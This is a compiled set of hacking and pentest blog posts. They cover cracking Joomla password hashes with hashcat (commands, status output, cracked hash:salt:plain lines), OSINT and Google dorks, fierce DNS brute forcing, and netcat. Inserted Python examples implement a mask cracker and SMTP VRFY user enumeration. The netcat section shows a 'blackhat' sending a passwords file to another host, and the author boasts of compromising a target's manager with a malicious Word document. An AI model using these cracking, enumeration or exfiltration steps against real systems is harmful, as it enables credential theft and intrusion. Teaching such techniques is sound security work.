Cracking Joomla salted hashes with hashcat (cudaHashcat-plus)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Hashcat is one of the fastest hash crackers there is, and the best hash cracking tool I have seen; compare it with other tools and you will see what I mean. I rarely use anything else to crack hashes. Today I will show how to crack Joomla hashes with it. My laptop uses NVIDIA Optimus, so the GPU binary has to be launched through optirun; if your computer is also Optimus, install Bumblebee first: www.bumblebee-project.org
Download:
science@BAD-LUCK:~$ mkdir tools
science@BAD-LUCK:~$ cd tools
science@BAD-LUCK:~/tools$ wget -c http://hashcat.net/files/oclHashcat-plus-0.09.7z
science@BAD-LUCK:~/tools$ 7z x oclHashcat-plus-0.09.7z
science@BAD-LUCK:~/tools$ cd oclHashcat-*
Note: I renamed my oclHashcat folder to hashcat-plus, which is why the prompt below shows that name.
science@BAD-LUCK:~/tools/hashcat-plus$ ls
cudaExample400.cmd cudaHashcat-plus32.exe example0.hash hashcat.pot oclExample400.sh oclHashcat-plus64.bin
charsets cudaExample400.sh cudaHashcat-plus64.bin example400.hash kernels oclExample500.cmd oclHashcat-plus64.exe
cudaExample500.cmd cudaHashcat-plus64.exe example500.hash oclExample0.cmd oclExample500.sh pass.txt
cudaExample0.cmd cudaExample500.sh docs example.dict oclExample0.sh oclHashcat-plus32.bin rules
cudaExample0.sh cudaHashcat-plus32.bin eula.accepted hashcat.hcstat oclExample400.cmd oclHashcat-plus32.exe vclHashcat-plus64.bin
The 7z archive contains the Windows and Linux builds for both 32-bit and 64-bit. The .bin files are the Linux binaries (32 or 64 bit) and the .exe files are for Windows; oclHashcat-plus targets AMD GPUs and cudaHashcat-plus targets NVIDIA. With an NVIDIA card on 64-bit Linux we need cudaHashcat-plus64.bin.
Now let's see all the options:
science@BAD-LUCK:~/tools/hashcat-plus$ optirun ./cudaHashcat-plus64.bin --help
cudaHashcat-plus, advanced password recovery
Usage: cudaHashcat-plus [options]... hash|hashfile|hccapfile [dictionary|mask|directory]...
=======
Options
=======
* General:
-m, --hash-type=NUM Hash-type, see references below
-a, --attack-mode=NUM Attack-mode, see references below
-V, --version Print version
-h, --help Print help
--eula Print EULA
--quiet Suppress output
* Misc:
--runtime=NUM Abort session after NUM seconds of runtime
--hex-salt Assume salt is given in hex
--hex-charset Assume charset is given in hex
--force Ignore warnings
* Markov:
--markov-hcstat Specify hcstat file to use, default is hashcat.hcstat
--markov-disable Disables markov-chains, emulates classic brute-force
--markov-classic Enables classic markov-chains, no per-position enhancement
-t, --markov-threshold=NUM Threshold when to stop accepting new markov-chains
* Files:
-o, --outfile=FILE Define outfile for recovered hash
--outfile-format=NUM Define outfile-format for recovered hash, see references below
-p, --seperator=CHAR Define seperator char for hashlists and outfile
--show Show cracked passwords only
--left Show un-cracked passwords only
--username Enable ignoring of usernames in hashfile
--remove Enable remove of hash once it is cracked
--disable-potfile Do not write potfile
* Resources:
-c, --segment-size=NUM Size in MB to cache from the wordfile
--cpu-affinity=STR Locks to CPU devices, seperate with comma
--gpu-async Use non-blocking async calls (NV only)
-d, --gpu-devices=STR Devices to use, separate with comma
-n, --gpu-accel=NUM Workload tuning: 1, 8, 40, 80, 160
--gpu-loops=NUM Workload fine-tuning: 8 - 1024
--gpu-temp-disable Disable temperature and fanspeed readings and triggers
--gpu-temp-abort=NUM Abort session if GPU temperature reaches NUM degrees celsius
--gpu-temp-retain=NUM Try to retain GPU temperature at NUM degrees celsius (AMD only)
* Rules:
-j, --rule-left=RULE Single rule applied to each word from left dict
-k, --rule-right=RULE Single rule applied to each word from right dict
-r, --rules-file=FILE Rules-file, multi use: -r 1.rule -r 2.rule
-g, --generate-rules=NUM Generate NUM random rules
--generate-rules-func-min=NUM Force NUM functions per random rule min
--generate-rules-func-max=NUM Force NUM functions per random rule max
* Custom charsets:
-1, --custom-charset1=CS User-defined charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS Sets charset ?1 to 0123456789abcdef
* Increment:
-i, --increment Enable increment mode
--increment-min=NUM Start incrementing at NUM
--increment-max=NUM Stop incrementing at NUM
==========
References
==========
* Outfile Formats:
1 = hash[:salt]
2 = plain
3 = hash[:salt]:plain
4 = hex_plain
5 = hash[:salt]:hex_plain
6 = plain:hex_plain
7 = hash[:salt]:plain:hex_plain
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?a = ?l?u?d?s
?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?h = 8 bit characters from 0xc0 - 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet
* Attack modes:
0 = Straight
1 = Combination
3 = Brute-force
6 = Hybrid dict + mask
7 = Hybrid mask + dict
* Generic hash types:
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
30 = md5(unicode($pass).$salt)
40 = md5($salt.unicode($pass))
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
130 = sha1(unicode($pass).$salt)
140 = sha1($salt.unicode($pass))
300 = MySQL
400 = phpass, MD5(WordPress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1500 = descrypt, DES(Unix), Traditional DES
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1800 = sha512crypt, SHA512(Unix)
2100 = Domain Cached Credentials2, mscash2
2400 = Cisco-PIX MD5
2500 = WPA/WPA2
2600 = Double MD5
3000 = LM
3100 = Oracle 7-10g, DES(Oracle)
3200 = bcrypt, Blowfish(OpenBSD)
* Specific hash types:
11 = Joomla
21 = osCommerce, xt:Commerce
101 = nsldap, SHA-1(Base64), Netscape LDAP SHA
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
112 = Oracle 11g
121 = SMF > v1.1
122 = OSX v10.4, v10.5, v10.6
131 = MSSQL(2000)
132 = MSSQL(2005)
141 = EPiServer 6.x
1722 = OSX v10.7
2611 = vBulletin < v3.8.5
2711 = vBulletin > v3.8.5
2811 = IPB2+, MyBB1.2+
science@BAD-LUCK:~/tools/hashcat-plus$
 
That is a lot of options! We only need a few:
-a // attack mode (3 = brute-force / mask)
-m // hash type (11 = Joomla)
--increment // try every length in a range instead of only the full mask
--increment-min // shortest length to try
--increment-max // longest length to try
-o // output file for the cracked hashes
path/to/hash/file // the file containing the hashes to crack
-1 // custom charset, referenced as ?1 in the mask
So we need it like:
-a 3
-m 11
--increment
--increment-min=4
--increment-max=10
-o crack/cracked.txt
crack/hash.txt
-1 ?l?d ?1?1?1?1?1?1?1?1?1?1
Here ?l = a-z and ?d = 0-9 are combined into custom charset 1 (-1 ?l?d), and every ?1 in the mask is one position drawn from that charset. The mask has ten positions, so with --increment-min=4 and --increment-max=10 hashcat tries lengths 4 through 10. The hash file must contain one entry per line in the form hash:salt, which is how Joomla stores it: the MD5 of the password with the 32-character salt appended (md5($pass.$salt), hashcat mode 11).
So All in one :
science@BAD-LUCK:~/tools/hashcat-plus$ optirun ./cudaHashcat-plus64.bin -a 3 -m 11 --increment --increment-min=4 --increment-max=10 -o crack/cracked.txt crack/hash.txt -1 ?l?d ?1?1?1?1?1?1?1?1?1?1
cudaHashcat-plus v0.09 by atom starting…
Hashes: 166 total, 166 unique salts, 166 unique digests
Bitmaps: 11 bits, 2048 entries, 0x000007ff mask, 8192 bytes
Workload: 256 loops, 80 accel
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GT 525M, 1023MB, 1200Mhz, 2MCU
Device #1: Kernel ./kernels/4318/m0010_a3.sm_21.ptx
[s]tatus [p]ause [r]esume [b]ypass [q]uit =>
hashcat is now working through the hashes. Press s to see its progress; each time the mask grows by one position the timers and counters restart for the new length. For example:
[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Status.......: Running
Input.Mode...: Mask (?1?1?1?1?1)
Hash.Target..: File (crack/hash.txt)
Hash.Type....: Joomla
Time.Running.: 58 secs
Time.Left....: 3 secs
Time.Util....: 58232.2ms/203.6ms Real/CPU, 0.4% idle
Speed........: 159.6M c/s Real, 160.3M c/s GPU
Recovered....: 2/166 Digests, 2/166 Salts
Progress.....: 9404743680/10037385216 (93.70%)
Rejected.....: 109117440/9404743680 (1.16%)
HWMon.GPU.#1.: -1% Util, 69c Temp, -1% Fan
[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Status.......: Running
Input.Mode...: Mask (?1?1?1?1?1?1)
Hash.Target..: File (crack/hash.txt)
Hash.Type....: Joomla
Time.Running.: 6 mins, 3 secs
Time.Left....: 26 mins, 53 secs
Time.Util....: 363169.9ms/188.2ms Real/CPU, 0.1% idle
Speed........: 168.7M c/s Real, 168.8M c/s GPU
Recovered....: 14/166 Digests, 14/166 Salts
Progress.....: 64146636800/361345867776 (17.75%)
Rejected.....: 2866544640/64146636800 (4.47%)
HWMon.GPU.#1.: -1% Util, 74c Temp, -1% Fan
[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Status.......: Running
Input.Mode...: Mask (?1?1?1?1?1?1?1)
Hash.Target..: File (crack/hash.txt)
Hash.Type....: Joomla
Time.Running.: 1 min, 21 secs
Time.Left....: 19 hours, 12 mins
Time.Util....: 81672.0ms/194.0ms Real/CPU, 0.2% idle
Speed........: 168.6M c/s Real, 169.1M c/s GPU
Recovered....: 17/166 Digests, 17/166 Salts
Progress.....: 17595105280/13008451239936 (0.14%)
Rejected.....: 3822059520/17595105280 (21.72%)
HWMon.GPU.#1.: -1% Util, 73c Temp, -1% Fan

The status says 17 hashes are cracked already. Note the Progress denominator: it is the mask keyspace (36^5 for the five-position mask) multiplied by the 166 unique salts, because every candidate has to be hashed once per salt. That is the whole point of salting: the same wordlist or mask costs 166 times more against this file than it would against 166 unsalted MD5 hashes. Mode 11 covers the legacy Joomla scheme; Joomla 3.2 and later store bcrypt ($2y$...) hashes, which are hashcat mode 3200 and several orders of magnitude slower to crack. The recovered entries are written to the output file as hash:salt:plain:
science@BAD-LUCK:~/tools/hashcat-plus$ cat crack/cracked.txt
44e9fec8983b8d5b2519bc6cf43cfd5d:0rxvGVjsiQocyS3yDvce9Cwb1vZN9RHl:test
28643071c72373b01eb941ae4f3bb0a5:lq0jeJAZ1axYQOsK5Gu0XfEURqRicoDC:123456
Enjoy cracking!
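The Python below is an added example, not code from the post, that shows what hashcat is doing in mode 11: it builds a legacy Joomla record (md5($pass.$salt) followed by the salt), verifies hash:salt:plain lines of the kind written to cracked.txt, runs a small pure-Python increment-mode mask attack, and reproduces the per-salt Progress figures from the status output above. The salt and password used for the demo are constructed; the two quoted lines are the post's own output and are only re-checked, not assumed correct.

```python
"""Legacy Joomla hashes (hashcat -m 11): build, verify, mask-crack, count work.
Added example, not from the post. Salt/password below are constructed."""
import hashlib
import itertools

# Constructed sample record: 32-character salt, as Joomla stores it.
CONSTRUCTED_SALT = "Q7xSalt3v0rB9LaKeW1p5ZdN8cYhTmGu"
CONSTRUCTED_PASSWORD = "cab"

# Lines quoted from the post's cracked.txt (hash:salt:plain), re-checked below.
POSTED_LINES = [
    "44e9fec8983b8d5b2519bc6cf43cfd5d:0rxvGVjsiQocyS3yDvce9Cwb1vZN9RHl:test",
    "28643071c72373b01eb941ae4f3bb0a5:lq0jeJAZ1axYQOsK5Gu0XfEURqRicoDC:123456",
]


def joomla_hash(password: str, salt: str) -> str:
    """Legacy Joomla scheme, hashcat mode 11: md5($pass.$salt)."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def joomla_record(password: str, salt: str) -> str:
    """hash:salt, the line format hashcat -m 11 expects in the hash file."""
    return f"{joomla_hash(password, salt)}:{salt}"


def verify_line(line: str) -> bool:
    """Check a hash:salt:plain line (outfile format 3) against its own plaintext."""
    digest, salt, plain = line.split(":", 2)
    return joomla_hash(plain, salt) == digest


def keyspace(charset_size: int, min_len: int, max_len: int, unique_salts: int = 1) -> dict:
    """Candidates per mask length the way hashcat's Progress counter reports them:
    charset_size**length times the number of unique salts, since every candidate
    is hashed once per salt. 36 chars (?l?d), length 5, 166 salts -> 10037385216."""
    return {n: charset_size ** n * unique_salts for n in range(min_len, max_len + 1)}


def mask_crack(records, charset: str, min_len: int, max_len: int) -> dict:
    """Increment-mode mask attack (hashcat -a 3 --increment) in pure Python:
    walk lengths min_len..max_len, try every combination of `charset` at that
    length, test each candidate against every still-uncracked salt.
    Returns {record: plaintext} for the records recovered."""
    pending = {rec: tuple(rec.split(":")[:2]) for rec in records}
    found = {}
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            for rec, (digest, salt) in list(pending.items()):
                if joomla_hash(candidate, salt) == digest:
                    found[rec] = candidate
                    del pending[rec]
            if not pending:
                return found
    return found


if __name__ == "__main__":
    target = joomla_record(CONSTRUCTED_PASSWORD, CONSTRUCTED_SALT)
    print("cracked:", mask_crack([target], "abc", 1, 3))
    print("posted lines verify:", [verify_line(line) for line in POSTED_LINES])
    print("candidates per length for the post's run:", keyspace(36, 4, 10, 166))
```

The toy cracker tries every salt for every candidate, exactly the loop that makes hashcat's Progress denominator grow with the salt count; a real run should use hashcat, but this makes the cost model visible.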
Posted on sysexploits too

PENETRATION TESTING???

Penetration Testing can be done in 4 stages:
  1. Information Gathering.
  2. Enumeration and vulnerability analysis.
  3. Exploitation.
  4. Post Exploitation.
Pentesting is like actual hacking: these are the same steps an attacker goes through to succeed. I am going to explain basic information gathering here, which is the first stage for any hacker or pentester.
Information Gathering:
Information gathering is the most important stage for a penetration tester: it is where we map the target network, and a successful attack is built on it. There is a lot to find out before any actual attack or exploitation, and the more information we have, the more effective the attack we can make. There are various ways to gather information about a target network:
Open source intelligence gathering.
Network discovery and DNS enumeration.
Email discovery and footprinting.
Etc.
Open Source Intelligence Gathering: OSINT may take a week or even a month, because here the penetration tester looks for everything the target has made public: what the organization is looking for, whether it needs new employees, whether someone has described its internal systems publicly, and so on. We also need their email addresses, phone numbers, physical address, social network profiles, DNS information and more. How much time you spend depends on whether you are an attacker or a penetration tester. A pentester hired for a short engagement has limited time and has to gather this information as fast as possible; an attacker whose only goal is success can spend as long as it takes to prepare an effective attack. Either way, we may gather information from:
From the website:
The target's own website yields a lot of valuable information: phone numbers, email addresses, employee names, comments in the HTML source, even the physical address, which matters a great deal for social engineering. We can also build a good wordlist from it for dictionary attacks later on. The best approach is to mirror the whole site with wget or httrack and review it offline in your browser: browse it with an open mind, read the source code, and you will find plenty of information.
Job posting:
The target organization may be hiring and will post openings on its own site or on third-party job boards. Organizations often describe their internal environment in the job description (database products, platforms and so on), along with responsibilities, conditions and salary range, which is very good for mapping the company structure. It tells us what the target needs and gives us internal contact details, which is exactly what a social engineering attack wants. True history: I sent my malicious Word document to the manager, and the idiot got hacked immediately. Can you guess why? I was even able to attack their MS SQL 2003 when they said they needed someone who was good with MS SQL too.
So we should routinely search for the organization name on Monster, CareerBuilder, Workforce and similar sites.
Forum:
When we have a problem we post it on a forum to get it solved, so why not our target? Their staff may post internal problems to get answers, and to be understood they have to post details, right? Here the hacker/pentester can take advantage, because those posts may contain code, configuration details and other information.
Social media: A great way to find additional important information, and these profiles can be used for an effective social engineering attack. I often search for the company name and employee names on Facebook, LinkedIn, Twitter and MySpace. Some employees post their phone number, email address, likes and dislikes, and so on.
Search engine: A search engine is an important and powerful tool for gathering information. Using Google we can find files such as financial reports or employee lists, email addresses for social engineering, links such as "index.php?id=44" to test for SQL injection, related companies and so on. Some useful operators:
site:sysexploits.net ; returns every indexed page on the target.
link:sysexploits.net ; pages that link to the target.
inurl:info.php site:sysexploits.net ; pages on the target whose URL contains info.php.
inurl:phpinfo.php
site:sysexploits.net inurl:phpinfo.php
filetype:sql ; try other file types too, such as pdf, txt, xls, doc.
site:sysexploits.net filetype:sql
intitle:login
There are tools that automate Google searching, such as Wikto, SiteDigger and Metagoofil.
There are many more dorks; see http://www.exploit-db.com/google-dorks/
Netcraft's DNS search is also worth a visit: http://searchdns.netcraft.com/
Network Discovery & DNS Enumeration:
Here we discover all IPs, DNS records, subdomains and so on; sometimes we even need to brute force subdomain names. The basic tools are host, whois, nslookup and dig. Third-party websites can do much of this too, and many offer it free. One of them is http://centralops.net/co/: enter the target IP or domain name and CentralOps will do whois lookups, DNS records (what nslookup would give you), traceroute and service scanning in one go.
DNS (Domain Name System) can provide us with valuable information. DNS translates domain names into IP addresses (32-bit IPv4 addresses, 128-bit for IPv6) and listens on port 53, UDP for ordinary queries and TCP for zone transfers and large responses. Numerous tools can be used for DNS enumeration:
  1. nslookup
  2. dig
  3. fierce (which can be used for brute forcing and really a good tool)
  4. whois
  5. host (command) etc.
A short explanation of DNS record types to get started:
A = maps a host name to an IPv4 address.
NS = name server for the zone (e.g. ns1.sysexploits.net).
MX = mail server records.
CNAME = an alias that points one name at another (canonical) name, so many names can end up at a single IP.
Email Discovery:
Email addresses are useful to hackers and pentesters for social engineering, so we often need to discover them. With Google (Google is the master!) we can search for them, for example "site:sysexploits.net contact" or "@sysexploits.net", and tools such as Maltego do the same in bulk. With netcat we can even talk to the SMTP server directly and enumerate usernames (the VRFY and EXPN commands, where the server still answers them).
These methods are very basic and only described briefly here, just to give an idea of what they are and how they work; I did not explain how to use the individual tools (really?), but hang around and we will publish more detailed tutorials.
Any feedback is always welcome, and thanks for reading!

DNS enumeration using fierce.pl


I have found fierce to be a powerful tool for DNS enumeration, and I use it often. It first checks whether the target allows a zone transfer; if not, it starts brute forcing host names with the default wordlist that ships with the tool. Believe it or not, most of the time I get very good results from it. Try it out yourself!

This tool is written in perl:

fierce.pl (C) Copywrite 2006,2007 – By RSnake at http://ha.ckers.org/fierce/

        Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Overview:
        Fierce is a semi-lightweight scanner that helps locate non-contiguous
        IP space and hostnames against specified domains.  It’s really meant
        as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all
        of those require that you already know what IP space you are looking
        for.  This does not perform exploitation and does not scan the whole
        internet indiscriminately.  It is meant specifically to locate likely
        targets both inside and outside a corporate network.  Because it uses
        DNS primarily you will often find mis-configured networks that leak
        internal address space. That’s especially useful in targeted malware.

Options:
        -connect        Attempt to make http connections to any non RFC1918
                (public) addresses.  This will output the return headers but
                be warned, this could take a long time against a company with
                many targets, depending on network/machine lag.  I wouldn’t
                recommend doing this unless it’s a small company or you have a
                lot of free time on your hands (could take hours-days). 
                Inside the file specified the text "Host:\n" will be replaced
                by the host specified. Usage:

        perl fierce.pl -dns example.com -connect headers.txt

        -delay          The number of seconds to wait between lookups.
        -dns            The domain you would like scanned.
        -dnsfile        Use DNS servers provided by a file (one per line) for
                reverse lookups (brute force).
        -dnsserver      Use a particular DNS server for reverse lookups
                (probably should be the DNS server of the target).  Fierce
                uses your DNS server for the initial SOA query and then uses
                the target’s DNS server for all additional queries by default.
        -file           A file you would like to output to be logged to.
        -fulloutput     When combined with -connect this will output everything
                the webserver sends back, not just the HTTP headers.
        -help           This screen.
        -nopattern      Don’t use a search pattern when looking for nearby
                hosts.  Instead dump everything.  This is really noisy but
                is useful for finding other domains that spammers might be
                using.  It will also give you lots of false positives,
                especially on large domains.
        -range          Scan an internal IP range (must be combined with
                -dnsserver).  Note, that this does not support a pattern
                and will simply output anything it finds.  Usage:

        perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

        -search         Search list.  When fierce attempts to traverse up and
                down ipspace it may encounter other servers within other
                domains that may belong to the same company.  If you supply a
                comma delimited list to fierce it will report anything found.
                This is especially useful if the corporate servers are named
                different from the public facing website.  Usage:

        perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

                Note that using search could also greatly expand the number of
                hosts found, as it will continue to traverse once it locates
                servers that you specified in your search list.  The more the
                better.
        -suppress       Suppress all TTY output (when combined with -file).
        -tcptimeout     Specify a different timeout (default 10 seconds).  You
                may want to increase this if the DNS server you are querying
                is slow or has a lot of network lag.
        -threads  Specify how many threads to use while scanning (default
          is single threaded).
        -traverse       Specify a number of IPs above and below whatever IP you
                have found to look for nearby IPs.  Default is 5 above and
                below.  Traverse will not move into other C blocks.
        -version        Output the version number.
        -wide           Scan the entire class C after finding any matching
                hostnames in that class C.  This generates a lot more traffic
                but can uncover a lot more information.
        -wordlist       Use a seperate wordlist (one word per line).  Usage:

        perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt

Download: http://ha.ckers.org/fierce/fierce.pl

Run: perl fierce.pl -dns yourtarget.net

Google Hacking!!!


Google is one of the best search engines, and it is also a very good friend of hackers. If you are new to hacking you may not know this, but most public (and some supposedly private) information can be gathered with Google, and it is even possible to find and break into servers and websites through it.

I have already explained public information gathering elsewhere. If you want to become more expert, know more about Google hacking and learn the techniques, go here:

http://www.exploit-db.com/google-dorks/

You will find lots of dorks on exploit-db. Enjoy!

Power of netcat


Netcat is not really a hacking tool; it is a networking tool. We can use it to talk to other computers remotely, transfer data, chat and so on. But it can also be used as a backdoor or an attack tool, in the same way that ping is not a DoS tool yet can be used to flood a host; we do not call ping a DDoS tool for that, do we?

Anyway, netcat is often called the "Swiss Army Knife" of networking.

I will explain its basic usage now.


All option in netcat:

nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] …
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e’; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, …
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp-data’).

We can use netcat as a backdoor and for banner grabbing, port scanning, chatting, file transfer, traffic redirection and more.

Banner Grabbing :

root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
 sent 16, rcvd 617

How: nc -vvv ip port, then type GET / HTTP/1.1 and press Enter twice; the empty line ends the request. (Apache answers 400 because HTTP/1.1 requires a Host header, but the Server line has already leaked in the response, which is all we wanted.)

We can see straight away that the web server is Apache 2.2.21 (Win32), and also the OpenSSL, PHP and mod_perl versions. Do you know how a vulnerability scanner works against a target? It first finds the version of the server/application and then checks it against its local database (Nessus, Acunetix and so on). We can do the same by hand and Google for vulnerabilities in that specific version, no?

In the same way we can find the versions of other applications:

 root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.

 
You can try this on any port except TLS ports such as 443, since netcat cannot speak SSL/TLS; for those use openssl s_client -connect host:443 (or ncat --ssl), or tunnel through them.
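The Python below is an added example, not code from the post, that scripts the two exchanges done by hand with nc on this page: the banner grab above (connect, send a bare GET, read whatever comes back and pull out the Server header) and the SMTP username enumeration mentioned in the Email Discovery section earlier (VRFY each name and read the reply code). Because the real targets are not reachable from here, two small stub services are started on 127.0.0.1 as constructed stand-ins for the Apache and SMTP daemons; their banner text, port numbers and mailbox names are assumptions for the demo.

```python
"""Banner grabbing and SMTP VRFY enumeration over raw TCP, as done by hand with nc.
Added example, not from the post. The two stubs are constructed stand-ins so the
whole thing runs offline on the loopback interface."""
import socket
import threading

# Constructed data for the stub services.
STUB_SERVER_HEADER = "Apache/2.2.21 (Win32) PHP/5.3.8 (constructed stub)"
STUB_MAILBOXES = {"root", "postmaster", "alice"}


def _stub_http(conn):
    """Minimal HTTP daemon: read the request head, answer 400 with a Server header."""
    rf = conn.makefile("rb")
    while rf.readline() not in (b"\r\n", b"\n", b""):
        pass
    body = b"<html><body><h1>Bad Request</h1></body></html>\n"
    head = (b"HTTP/1.1 400 Bad Request\r\nServer: " + STUB_SERVER_HEADER.encode()
            + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\nConnection: close\r\n\r\n")
    conn.sendall(head + body)
    rf.close()
    conn.close()


def _stub_smtp(conn):
    """Minimal SMTP daemon that still honours VRFY (many real servers disable it)."""
    rf = conn.makefile("r", encoding="ascii", errors="replace")
    conn.sendall(b"220 mail.example.test ESMTP constructed stub\r\n")
    for line in rf:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            conn.sendall(b"250 mail.example.test\r\n")
        elif verb == "VRFY":
            if arg in STUB_MAILBOXES:
                conn.sendall(f"250 <{arg}@example.test>\r\n".encode())
            else:
                conn.sendall(b"550 5.1.1 User unknown\r\n")
        elif verb == "QUIT":
            conn.sendall(b"221 Bye\r\n")
            break
        else:
            conn.sendall(b"502 Command not implemented\r\n")
    rf.close()
    conn.close()


def start_stub(handler) -> int:
    """Listen on a free loopback port, hand each connection to handler; return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 3.0) -> str:
    """Connect, optionally send a probe (e.g. a bare GET), read until the peer closes."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # services like FTP keep the socket open after the banner
    return b"".join(chunks).decode("latin-1")


def server_header(banner: str):
    """Pull the Server: value out of an HTTP response head, or None."""
    for line in banner.split("\r\n\r\n", 1)[0].splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return None


def smtp_vrfy_enum(host: str, port: int, names) -> dict:
    """Map each name to the reply code for VRFY name: 250 exists, 550 unknown,
    252 means the server refuses to confirm (enumeration is blocked)."""
    results = {}
    with socket.create_connection((host, port), timeout=3.0) as s:
        rf = s.makefile("r", encoding="ascii", errors="replace")
        rf.readline()                    # 220 greeting
        s.sendall(b"HELO probe.local\r\n")
        rf.readline()                    # 250
        for name in names:
            s.sendall(f"VRFY {name}\r\n".encode())
            results[name] = int(rf.readline()[:3])
        s.sendall(b"QUIT\r\n")
        rf.close()
    return results


HTTP_PORT = start_stub(_stub_http)
SMTP_PORT = start_stub(_stub_smtp)

if __name__ == "__main__":
    banner = grab_banner("127.0.0.1", HTTP_PORT, b"GET / HTTP/1.1\r\n\r\n")
    print("Server:", server_header(banner))
    print(smtp_vrfy_enum("127.0.0.1", SMTP_PORT, ["alice", "bob", "root"]))
```

Against a real host, point grab_banner and smtp_vrfy_enum at the target address and port; a 252 reply to VRFY means the server will not confirm addresses and the RCPT TO response is the next thing to try.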

Chat with your hacker friend:

Suppose there are two hackers, hacker1 and hacker2. They do not want to get caught using a public messenger, or they just want private communication.

How do they do it? Simple commands:

hacker1 (netcat listening):

nc -vvv -l -p 4444

-vvv stands for verbose (as much as possible)

-l for listen mode (open the port and wait for a connection)

-p for the local port to listen on

hacker2 (connecting to hacker1, whose address is 192.168.96.129):

nc -vvv 192.168.96.129 4444   (4444 is the port)

Whatever either side types is sent to the other. Note that the traffic is plaintext: anyone on the path can read it.

Transfer a file:

Hackers do not want to transfer files through public file sharing services because of the risk, but they can use netcat instead.

Suppose hacker1 (blackhat) has a passwords file on his computer (192.168.96.129) and wants to send it to hacker2 (192.168.1.213).

hacker1's netcat command (serve the file on port 4444):

nc -vvv -l -p 4444 < passwords.txt

hacker2's netcat command (connect and write whatever arrives to a file):

nc -vvv 192.168.96.129 4444 > passwords.txt

When the transfer finishes, stop the receiving side (Ctrl-C, or give it -w with a timeout) and compare checksums of the two copies, for example with md5sum, to be sure nothing was truncated.
Let's do a port scan using netcat:

We can scan ports with a simple command: nc -vvv targetip 1-65535

or

nc -vvv -z targetip 1-65535

The extra -z option is zero-I/O mode: netcat only tests whether each port accepts a connection and neither sends nor reads any data, which is what you want for scanning. Add -n to skip DNS lookups and -w 1 for a one-second timeout per port, otherwise a full 65535-port scan takes a very long time.

